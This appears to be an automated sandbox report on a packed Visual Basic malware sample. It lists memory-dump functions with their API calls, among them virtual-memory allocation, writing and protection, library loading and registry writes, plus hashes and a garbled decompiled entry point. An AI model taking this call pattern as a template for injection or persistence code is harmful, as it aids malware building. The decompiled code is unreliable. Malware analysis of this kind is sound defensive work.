Function 021806BF, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 305COMMON

Download Yara Rule

APIs

EnumWindows.USER32(021807C3,?,00000000,00000000,1AC7BC37,1AC62057,?,654203E4,?,02188072,021804FC,-32C745D8,1FFAC1AA,-8DFEB28D,6F01E8AF,C2E03886), ref: 02180743

Strings

Sl, xrefs: 02180C3D
%j, xrefs: 02180B26
e], xrefs: 02180CDA

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID: %j$Sl$e]
API String ID: 1129996299-2879593518
Opcode ID: 59507990aa9b65aeec600738b35f5cfd668423d17bee70368b492db4159e8656
Instruction ID: 5919f4af06976f9b4c54dbf42a874e3d1896d0bb6706f59bed176cdedd4f6ff1
Opcode Fuzzy Hash: 59507990aa9b65aeec600738b35f5cfd668423d17bee70368b492db4159e8656
Instruction Fuzzy Hash: 91C1EFB16443898FDB64EF28CC947EE77E2AF59350F15412AEC89EB240D7309A858F42

Uniqueness

Uniqueness Score: -1.00%

Function 02180CE4, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 546COMMON

Download Yara Rule

Strings

C50, xrefs: 02181021
zge5, xrefs: 02180FC8

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: C50$zge5
API String ID: 2616484454-907307994
Opcode ID: 6b0cba0aba151c8003c56659aa607aa69a39bd931d98f6b6dd504b5aee65f35b
Instruction ID: beba3e09d879025d63e14304baf851b2ce6360fc1f1e3330bed437052dd4e8e8
Opcode Fuzzy Hash: 6b0cba0aba151c8003c56659aa607aa69a39bd931d98f6b6dd504b5aee65f35b
Instruction Fuzzy Hash: 46222171A803899FDB78EE388889BEBBBE2AF99310F55412EDC8DDB211D7314545CB05

Uniqueness

Uniqueness Score: -1.00%

Function 02180DF4, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 457COMMON

Download Yara Rule

Strings

C50, xrefs: 02181021
zge5, xrefs: 02180FC8

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: C50$zge5
API String ID: 2616484454-907307994
Opcode ID: 733e7283937f141d62ce355cc139a99a0582edaf89162f629b6f5638d7917ff8
Instruction ID: 3a7280842040acb62a1cad0b1265c2ea1834ae6cf32dc3aa6bf618df9097968e
Opcode Fuzzy Hash: 733e7283937f141d62ce355cc139a99a0582edaf89162f629b6f5638d7917ff8
Instruction Fuzzy Hash: AD021471A843899FDB74AE3988847EE7BE2AF85300F56412EDC4DDB215D7309A86CF01

Uniqueness

Uniqueness Score: -1.00%

Function 02180CDF, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 452COMMON

Download Yara Rule

Strings

C50, xrefs: 02181021
zge5, xrefs: 02180FC8

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: C50$zge5
API String ID: 2616484454-907307994
Opcode ID: 442e44baeef3c51eceeb16e4319f90d4d0749f1f7740cea5cbde98a3ab99efc0
Instruction ID: 4a291ce04934f1d139d581d8c932ad2024c80787fbd39089dd949eb435390c27
Opcode Fuzzy Hash: 442e44baeef3c51eceeb16e4319f90d4d0749f1f7740cea5cbde98a3ab99efc0
Instruction Fuzzy Hash: 9F021371A843899FDB74AF3888847EA7BE2AF85300F56412EDC8DDB215D7349686CF01

Uniqueness

Uniqueness Score: -1.00%

Function 0218226F, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 339registryCOMMON

Download Yara Rule

APIs

Part of subcall function 021859E6: NtAllocateVirtualMemory.NTDLL ref: 02185C3F

RegCreateKeyExA.KERNELBASE ref: 02182508

Part of subcall function 02182533: RegSetValueExA.KERNELBASE(?,6BBC26FF), ref: 021825DB

Strings

1I, xrefs: 0218252E
8F7, xrefs: 02182299

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: AllocateCreateMemoryValueVirtual
String ID: 8F7$1I
API String ID: 17316909-1622922501
Opcode ID: 499f668a398e59b9eede0bee1bc7a9b4b49013bb8e08bd963cbd78e9e4d3965c
Instruction ID: f69c2f9731aa8c81fb94acbdfd8adf8b85f14ced440c9f537fd7cbebc375e8b3
Opcode Fuzzy Hash: 499f668a398e59b9eede0bee1bc7a9b4b49013bb8e08bd963cbd78e9e4d3965c
Instruction Fuzzy Hash: D7B1B4747453826FD79DDE749CCA9C7BBE49F6E320B18207E944ABB712E7B50404DA08

Uniqueness

Uniqueness Score: -1.00%

Function 02184CFA, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 338nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,1FCAF8AA,?,00000000,?,?,?,?,A89990A4), ref: 021850FB

Strings

S,2, xrefs: 02184EAE
9#S_, xrefs: 02184F0D

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: 9#S_$S,2
API String ID: 3527976591-957275654
Opcode ID: d7333ef75852d3bfd195be750c5bc1998f7b2f5957144d7cf16ad4a380b32bd5
Instruction ID: 0deb1a4e732593acbdcad786f434cd41436775e88b964ce523fc817d0e2188b6
Opcode Fuzzy Hash: d7333ef75852d3bfd195be750c5bc1998f7b2f5957144d7cf16ad4a380b32bd5
Instruction Fuzzy Hash: BED110716402899FDB79DE39DDCAACBB7E2EF69310F44402ED8499B321E7714A41DB04

Uniqueness

Uniqueness Score: -1.00%

Function 021896A8, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 250COMMON

Download Yara Rule

APIs

K32GetDeviceDriverBaseNameA.KERNEL32 ref: 02189A28

Strings

a2O1, xrefs: 02189930
]Faz, xrefs: 02189902

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: BaseDeviceDriverName
String ID: ]Faz$a2O1
API String ID: 2335996259-3147131839
Opcode ID: de598f4122e0e0e93f5743d5a5a2408c84163db162ec6dbc68a5cafc07ae0201
Instruction ID: 76ab90329407d7439fa3ff9d65d9dbeef3a59ef287565ebe18d85c3b8b34452a
Opcode Fuzzy Hash: de598f4122e0e0e93f5743d5a5a2408c84163db162ec6dbc68a5cafc07ae0201
Instruction Fuzzy Hash: FF9133306003829FDB69DE78D9DAAD7BBE1AF6E310F14503EC80EAB726D3764504CA04

Uniqueness

Uniqueness Score: -1.00%

Function 0218086F, Relevance: 4.1, Strings: 3, Instructions: 315COMMON

Download Yara Rule

Strings

Sl, xrefs: 02180C3D
%j, xrefs: 02180B26
e], xrefs: 02180CDA

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: %j$Sl$e]
API String ID: 2616484454-2879593518
Opcode ID: 39e673f73bb3e0d2f1e673e4e523e6655b8dfc7fb94d82bac8168e593f396c2c
Instruction ID: fe011411dba76526383dadcb4a3b596aa016657edcd774c02c35e38bea032185
Opcode Fuzzy Hash: 39e673f73bb3e0d2f1e673e4e523e6655b8dfc7fb94d82bac8168e593f396c2c
Instruction Fuzzy Hash: 18B103706403859FDB68EE38DCCABDAB7E1AF6D354F18502EE889EB311E77549408B04

Uniqueness

Uniqueness Score: -1.00%

Function 021807F2, Relevance: 4.0, Strings: 3, Instructions: 246COMMON

Download Yara Rule

Strings

Sl, xrefs: 02180C3D
%j, xrefs: 02180B26
e], xrefs: 02180CDA

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: %j$Sl$e]
API String ID: 1029625771-2879593518
Opcode ID: b46a3defa8c418f452d03070e8a81c99bb86dd4f2cacd4beecf3dd3ee1b893f7
Instruction ID: c58de341cb6e2fc4908abfcbf2a0c86e5e6b8d2bda137aec8812d7675bc98e71
Opcode Fuzzy Hash: b46a3defa8c418f452d03070e8a81c99bb86dd4f2cacd4beecf3dd3ee1b893f7
Instruction Fuzzy Hash: 25A1EEB1A443898FDB64EE28CC907EE77E2AF48354F15412AEC88EB244D7359A858F51

Uniqueness

Uniqueness Score: -1.00%

Function 02188053, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 315COMMON

Download Yara Rule

Strings

|Jm7, xrefs: 021875C4

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: |Jm7
API String ID: 1029625771-357464267
Opcode ID: 890db8daac440d90ced917b2cd52048f002709ac46595181ef66fbd57df2e597
Instruction ID: b4ae7ea9283ce0bf09d191f54674a3401ff71074c5533f9e2c4e651cf4adec77
Opcode Fuzzy Hash: 890db8daac440d90ced917b2cd52048f002709ac46595181ef66fbd57df2e597
Instruction Fuzzy Hash: BDC13571A403499FDB70EE388CC47DA76A2AF49350F65862ADC1CDB345E7309A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02185D6E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 146libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 021859E6: NtAllocateVirtualMemory.NTDLL ref: 02185C3F

Part of subcall function 02187550: LoadLibraryA.KERNELBASE(?,654203E4,?,02188072,021804FC,-32C745D8,1FFAC1AA,-8DFEB28D,6F01E8AF,C2E03886,9BF726CB), ref: 02187688

LdrInitializeThunk.NTDLL ref: 021866F9

Strings

%p), xrefs: 0218796A

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: AllocateInitializeLibraryLoadMemoryThunkVirtual
String ID: %p)
API String ID: 2230336791-256374023
Opcode ID: 4f873161138600d2f2b57788746e899b853258bd4f92a044b0f6efb9c7914fce
Instruction ID: a88bed5abc33a6a9b7f62bd378d2077a9d80d441ad6a4b5c69c37b8d21b6fe6c
Opcode Fuzzy Hash: 4f873161138600d2f2b57788746e899b853258bd4f92a044b0f6efb9c7914fce
Instruction Fuzzy Hash: 76416A75A406888FCB31FF7889D03E9B7A3BF99320F64811AD84E8B244DB318642CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02186663, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 021866F9

Strings

\/J4, xrefs: 0218667B

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID: \/J4
API String ID: 2994545307-3098295777
Opcode ID: 6c32ab7706904a505de918a6819338a803b9f59fb601b605fda35bacdc5cd068
Instruction ID: 0ac34f640b5bca289837f4e48929391cf947c74f842ab09bd7bd275d7715b80d
Opcode Fuzzy Hash: 6c32ab7706904a505de918a6819338a803b9f59fb601b605fda35bacdc5cd068
Instruction Fuzzy Hash: 2F01C9290887C99AC702777800E12897FE6FF073547AC4190D4824B216DB01C01BCBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0218914B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-3C83A361,?,?,?,?,021888C6,-CF377129,02184536,C60FD85E), ref: 021892D5

Strings

0K, xrefs: 021892B5

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: 0K
API String ID: 2706961497-3176382993
Opcode ID: ae055fc8c07f390df34782bb6b04f06fdc6b39ac3be9f2b61a64e992c5067df8
Instruction ID: 26caf5e04453a927c9171caa50e7702450a0a3bbb9e58df6167398147377d10b
Opcode Fuzzy Hash: ae055fc8c07f390df34782bb6b04f06fdc6b39ac3be9f2b61a64e992c5067df8
Instruction Fuzzy Hash: CA01FBB1745144EFEB78DE1CCC54AEA76EBABC8300F04843AE80DDB308D6709E018B11

Uniqueness

Uniqueness Score: -1.00%

Function 0218929D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-3C83A361,?,?,?,?,021888C6,-CF377129,02184536,C60FD85E), ref: 021892D5

Strings

0K, xrefs: 021892B5

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: 0K
API String ID: 2706961497-3176382993
Opcode ID: df706507d62837fef953aba7e7cabfb0a27f68515402ad7fc47e1c1123dfc8a9
Instruction ID: de110793b76a21102856e3eca7c75cdefe1202e66f5f60a4aecd6dc9d57efeaa
Opcode Fuzzy Hash: df706507d62837fef953aba7e7cabfb0a27f68515402ad7fc47e1c1123dfc8a9
Instruction Fuzzy Hash: 7ED0A7A1382B06DBCB24EF3ECC425EBB7A79FD4344F48C033A81C56728E63055038512

Uniqueness

Uniqueness Score: -1.00%

Function 02181136, Relevance: 1.9, APIs: 1, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97ee86f3d397a671c535f54163f37b1cc712533081d3b6395db0e37bc0ac5b7e
Instruction ID: be7f4cf13d7a69380a63ebb7c4247fd812b7c33324135f4c4c7e7b1a327f11fb
Opcode Fuzzy Hash: 97ee86f3d397a671c535f54163f37b1cc712533081d3b6395db0e37bc0ac5b7e
Instruction Fuzzy Hash: 6BD15470644385AFDB78EE7888CABDBBBE2AF59314F49412E984DEB212D7314541CB05

Uniqueness

Uniqueness Score: -1.00%

Function 021810F0, Relevance: 1.8, APIs: 1, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a33e7ef2722e52771a59f95cb37f273695e5b4ff06193e85897497098d96205
Instruction ID: 927a23ae3021d6e7a22bf53713c10e61373e7d2653f36dc9244f0eb1960d3582
Opcode Fuzzy Hash: 6a33e7ef2722e52771a59f95cb37f273695e5b4ff06193e85897497098d96205
Instruction Fuzzy Hash: C4C13471A483899FDB75AF388888BEA7BE2AF45304F56421EDC8DCB241C7359586CF01

Uniqueness

Uniqueness Score: -1.00%

Function 02181113, Relevance: 1.8, APIs: 1, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 458c99ee4bc4ca62d52a7186b2583278befcbd4d6c046c93360cdb5ee9416876
Instruction ID: 9b6d1bfc482fa1c724b4593561f8d87f7f5096e53f35b80e6252b783df9d1ec6
Opcode Fuzzy Hash: 458c99ee4bc4ca62d52a7186b2583278befcbd4d6c046c93360cdb5ee9416876
Instruction Fuzzy Hash: 38B13571A487899FDB74AE78C888BEB7BA2AF45304F56421DDC4DCB211C7315686CF02

Uniqueness

Uniqueness Score: -1.00%

Function 02185A22, Relevance: 1.7, APIs: 1, Instructions: 193memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02187550: LoadLibraryA.KERNELBASE(?,654203E4,?,02188072,021804FC,-32C745D8,1FFAC1AA,-8DFEB28D,6F01E8AF,C2E03886,9BF726CB), ref: 02187688

NtAllocateVirtualMemory.NTDLL ref: 02185C3F

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 99fec656abd70acff792b6f934110ea7a8d94138254f6ebd42622260197eb82f
Instruction ID: 5e5b2be2eeb99575e22f5eec73badd557bafb33b18313e4238c69a03d4011d7c
Opcode Fuzzy Hash: 99fec656abd70acff792b6f934110ea7a8d94138254f6ebd42622260197eb82f
Instruction Fuzzy Hash: E751E4707003459FDB58DE79AC8AAC7B7E1EF6E310F08503E994EA7321E77649049A08

Uniqueness

Uniqueness Score: -1.00%

Function 021859E6, Relevance: 1.6, APIs: 1, Instructions: 108memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02187550: LoadLibraryA.KERNELBASE(?,654203E4,?,02188072,021804FC,-32C745D8,1FFAC1AA,-8DFEB28D,6F01E8AF,C2E03886,9BF726CB), ref: 02187688

NtAllocateVirtualMemory.NTDLL ref: 02185C3F

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 866aa2e84867f28290c1fb3d7e9173726b30084cf1f2425e24dd4807c575e26e
Instruction ID: d58485f2e13bb6cb5cf5a77d65183f6b93dc9e3ccbe86a28af3ab94e410606d4
Opcode Fuzzy Hash: 866aa2e84867f28290c1fb3d7e9173726b30084cf1f2425e24dd4807c575e26e
Instruction Fuzzy Hash: 4841DFB1608248DFEB349E69DC95BEA7BB2EF88300F45452DEC4D8B350D7359A85CB05

Uniqueness

Uniqueness Score: -1.00%

Function 0218231C, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 421registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNELBASE ref: 02182508

Part of subcall function 02182533: RegSetValueExA.KERNELBASE(?,6BBC26FF), ref: 021825DB

Strings

1I, xrefs: 0218252E

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: CreateValue
String ID: 1I
API String ID: 2259555733-762079770
Opcode ID: 62a492b63baaa76c73236df268530ebebb605086ba26fb2f30ce01c5609700a1
Instruction ID: 95d2ad3e1afe47a059876dcc88ff84d6247126e1b7d735073e5a3caa238bc610
Opcode Fuzzy Hash: 62a492b63baaa76c73236df268530ebebb605086ba26fb2f30ce01c5609700a1
Instruction Fuzzy Hash: 53D180747457826FD78DDA74A9CF8C3FBD49F7E224718207E904AB7726E7B60404AA08

Uniqueness

Uniqueness Score: -1.00%

Function 021824CE, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 277registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNELBASE ref: 02182508

Part of subcall function 02182533: RegSetValueExA.KERNELBASE(?,6BBC26FF), ref: 021825DB

Strings

1I, xrefs: 0218252E

Memory Dump Source

Source File: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Yara matches

Similarity

API ID: CreateValue
String ID: 1I
API String ID: 2259555733-762079770
Opcode ID: 743d4a096600d28cbb13b4a2cec9f2dd2a4f2d3cfb2049fd97cdb38668d7854b
Instruction ID: 1334a89ada08847822843db8d164bf25d696f661bac8efb89a3c3b9340a48cfa
Opcode Fuzzy Hash: 743d4a096600d28cbb13b4a2cec9f2dd2a4f2d3cfb2049fd97cdb38668d7854b
Instruction Fuzzy Hash: 8181A1747457826ED78DDA74A8CF8C3FBD49F7E224718707E914AB7722E3B60404AA08

Uniqueness

Uniqueness Score: -1.00%

Function 00401144, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			_entry_(signed int __eax, signed int __ebx, void* __ecx, void* __edx, void* __edi, signed int __esi) {
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t36;
				signed int _t38;
				intOrPtr* _t41;
				intOrPtr* _t42;
				intOrPtr* _t45;
				void* _t47;
				signed char _t49;
				void* _t51;
				signed int _t56;
				signed int _t57;
				void* _t58;
				void* _t64;
				signed int _t66;

				_push("VB5!6&*"); // executed
				L0040113E(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t32 = __eax - 1;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *((intOrPtr*)(__esi - 0xa)) =  *((intOrPtr*)(__esi - 0xa)) + __ebx;
				_t41 = __ecx - 1;
				 *(__edi + 0x16a34338 + __ebx * 2) =  ~( *(__edi + 0x16a34338 + __ebx * 2));
				asm("fisttp qword [esi-0x28d14792]");
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				_t47 = __edx + 1;
				 *((intOrPtr*)(__esi)) =  *((intOrPtr*)(__esi)) + _t32;
				_push(_t32);
				 *_t41 =  *_t41 + 0x53;
				_push(_t66);
				_push(_t66);
				_t51 = __edi - 1;
				_push(_t47);
				_push(__ebx);
				_push(_t66);
				_t56 = __esi;
				_t64 = _t58 + 2 + 2;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				asm("rcr byte [ecx+0x3], 0x0");
				 *_t32 =  *_t32 + _t32;
				_t38 = __ebx + __ebx;
				asm("int3");
				 *_t32 =  *_t32 ^ _t32;
				es = _t47;
				do {
					_t47 = _t47 - 1;
					 *_t32 =  *_t32 | _t32;
					asm("std");
					asm("out 0x3a, al");
					_t51 = _t51 + 1;
					_t9 = _t47 + 0x6b;
					_t10 = _t38;
					_t38 =  *_t9;
					 *_t9 = _t10;
					asm("out dx, eax");
					asm("in al, dx");
					_t66 = _t66 + 1;
				} while (_t51 == 0);
				asm("scasb");
				_t11 = _t64 - 0x57b79f5c;
				 *_t11 =  *((intOrPtr*)(_t64 - 0x57b79f5c)) + _t38;
				asm("lodsd");
				if( *_t11 != 0) {
					_t56 = _t56 & _t66;
					_push(es);
					_t36 = _t32;
					asm("stosb");
					 *((intOrPtr*)(_t36 - 0x2d)) =  *((intOrPtr*)(_t36 - 0x2d)) + _t36;
					_t32 = _t38 ^  *(_t41 - 0x48ee309a);
					_t38 = _t36;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
					 *_t32 =  *_t32 + _t32;
				}
				_t57 = _t56 + 1;
				_pop(_t42);
				 *_t32 =  *_t32 + _t32;
				_pop(_t33);
				 *_t33 =  *_t33 + _t33;
				 *_t42 =  *_t42 + _t42;
				 *((intOrPtr*)(_t57 + 0x45)) =  *((intOrPtr*)(_t57 + 0x45)) + _t33;
				_push(_t66);
				_push(_t38);
				_push(_t38);
				 *0x44000701 =  *0x44000701 + _t42;
				_push(_t47);
				_push(_t64 + 1);
				_t35 = _t33;
				_t45 = _t66;
				 *_t45 =  *_t45 + _t38;
				 *_t35 =  *_t35 + _t35;
				 *_t38 =  *_t38 + _t35;
				asm("ficom word [edi]");
				 *((intOrPtr*)(_t66 + _t57 * 2)) =  *((intOrPtr*)(_t66 + _t57 * 2)) + _t45;
				_t49 = _t47 + 1 + _t47 + 1;
				_push(_t52 - 1);
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				_push(es);
				 *_t35 =  *_t35 + _t49;
				 *_t35 =  *_t35 ^ _t35;
				 *_t45 =  *_t45 + _t35;
				 *_t35 =  *_t35 + _t45;
				 *((intOrPtr*)(_t35 + 0x6600000e)) =  *((intOrPtr*)(_t35 + 0x6600000e)) + _t45;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 & _t35;
				 *_t45 =  *_t45 + _t35;
				 *_t35 =  *_t35 + _t45;
				 *((intOrPtr*)(_t35 + 0xe000008)) =  *((intOrPtr*)(_t35 + 0xe000008)) + _t45;
				asm("sldt word [eax]");
				asm("adc [eax], dl");
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 | _t35;
				ss = 0xb6000005;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 ^ _t49;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 & _t35;
				 *_t35 =  *_t35 + _t35;
				_push(ds);
				asm("sbb eax, 0x20200000");
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 & _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t49 = 0;
				asm("adc [eax], dl");
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 & _t35;
				_push(0x6e000004);
				_push(_t38);
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 - _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 ^ _t35;
				 *_t35 =  *_t35 + _t35;
				asm("pushad");
				 *_t35 =  *_t35 + _t35;
				 *_t45 =  *_t45 + _t35;
				 *_t35 =  *_t35 + _t45;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 | _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				asm("fstp1 st1");
				asm("invalid");
				asm("aad 0xd5");
				asm("aad 0xd9");
				asm("int 0xcd");
				asm("aad 0xd9");
				return _t35;
			}

0x00401144
0x00401149
0x0040114e
0x00401150
0x00401152
0x00401154
0x00401156
0x00401158
0x00401159
0x0040115b
0x0040115d
0x0040115f
0x00401162
0x00401163
0x0040116a
0x00401170
0x00401172
0x00401174
0x00401176
0x00401178
0x0040117a
0x0040117b
0x0040117d
0x0040117e
0x00401181
0x00401184
0x00401185
0x00401186
0x00401187
0x00401188
0x0040118e
0x0040118f
0x00401190
0x00401192
0x00401194
0x00401199
0x0040119b
0x0040119d
0x0040119e
0x004011a0
0x004011a1
0x004011a1
0x004011a2
0x004011a4
0x004011a5
0x004011a7
0x004011a9
0x004011a9
0x004011a9
0x004011a9
0x004011ac
0x004011ad
0x004011ae
0x004011ae
0x004011b3
0x004011b4
0x004011b4
0x004011ba
0x004011bb
0x004011bd
0x004011bf
0x004011ca
0x004011cc
0x004011cd
0x004011d0
0x004011d0
0x004011d1
0x004011d3
0x004011d5
0x004011d7
0x004011d9
0x004011db
0x004011dd
0x004011df
0x004011e1
0x004011e3
0x004011e5
0x004011e7
0x004011e9
0x004011eb
0x004011ed
0x004011ef
0x004011f1
0x004011f3
0x004011f3
0x004011f5
0x004011f6
0x004011f7
0x004011f9
0x004011fb
0x004011fd
0x004011ff
0x00401202
0x00401204
0x00401207
0x00401209
0x0040120f
0x00401211
0x00401213
0x00401214
0x00401215
0x00401217
0x0040121a
0x0040121c
0x0040121f
0x00401223
0x00401225
0x00401226
0x00401228
0x0040122a
0x0040122c
0x0040122d
0x0040122f
0x00401231
0x00401233
0x00401235
0x0040123b
0x0040123d
0x0040123f
0x00401241
0x00401243
0x00401245
0x0040124b
0x0040124e
0x00401250
0x00401252
0x00401254
0x0040125b
0x0040125c
0x0040125e
0x00401260
0x00401262
0x00401264
0x00401268
0x0040126a
0x0040126b
0x00401270
0x00401272
0x00401274
0x00401278
0x0040127a
0x0040127e
0x00401280
0x00401282
0x00401284
0x00401286
0x0040128b
0x0040128c
0x0040128e
0x00401290
0x00401292
0x00401294
0x00401296
0x00401297
0x00401299
0x0040129b
0x0040129d
0x0040129f
0x004012a1
0x004012a3
0x004012a5
0x004012a7
0x004012a9
0x004012ab
0x004012ad
0x004012af
0x004012b1
0x004012b3
0x004012b5
0x004012b7
0x004012b9
0x004012ba
0x004012bc
0x004012be
0x004012c0
0x004012c2

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401149

Strings

VB5!6&*, xrefs: 00401144

Memory Dump Source

Source File: 00000001.00000002.342811828.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.342799004.0000000000400000.00000002.00020000.sdmp Download File
